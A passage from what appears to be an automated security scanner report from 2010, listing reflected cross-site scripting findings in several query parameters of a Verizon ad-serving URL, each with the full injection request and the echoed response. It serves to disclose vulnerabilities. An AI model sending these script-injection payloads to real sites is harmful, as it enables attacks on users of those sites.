Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.59. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 476c8"><script>alert(1)</script>1cd684a7591 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.60. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae33"><script>alert(1)</script>082704e552e was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/569197284/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=
...[SNIP]...

3.61. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db20a"><script>alert(1)</script>ad98c8a48bd was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
und2.net/homepage/L24/216072555/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&w
...[SNIP]...

3.62. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671eb"><script>alert(1)</script>2aafe3d0cfd was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/homepage/L24/920753079/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhostin
...[SNIP]...

3.63. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fa6"><script>alert(1)</script>3ed604c7372 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ne.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1588911915/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_
...[SNIP]...

3.64. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33f3"><script>alert(1)</script>46c97c97412 was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:49:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
al.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1866239870/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&au
...[SNIP]...

3.65. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 289de"><script>alert(1)</script>a27e6e3596 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
4/997221546/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb
...[SNIP]...

3.66. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1949"><script>alert(1)</script>a3917a638a8 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ds/click_lx.ads/vzsurround2.net/homepage/L24/218393888/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&onli
...[SNIP]...

3.67. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94696"><script>alert(1)</script>f2fcdc1fb36 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ads/vzsurround2.net/homepage/L24/242581337/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&s
...[SNIP]...

3.68. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d47"><script>alert(1)</script>810ed66b159 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
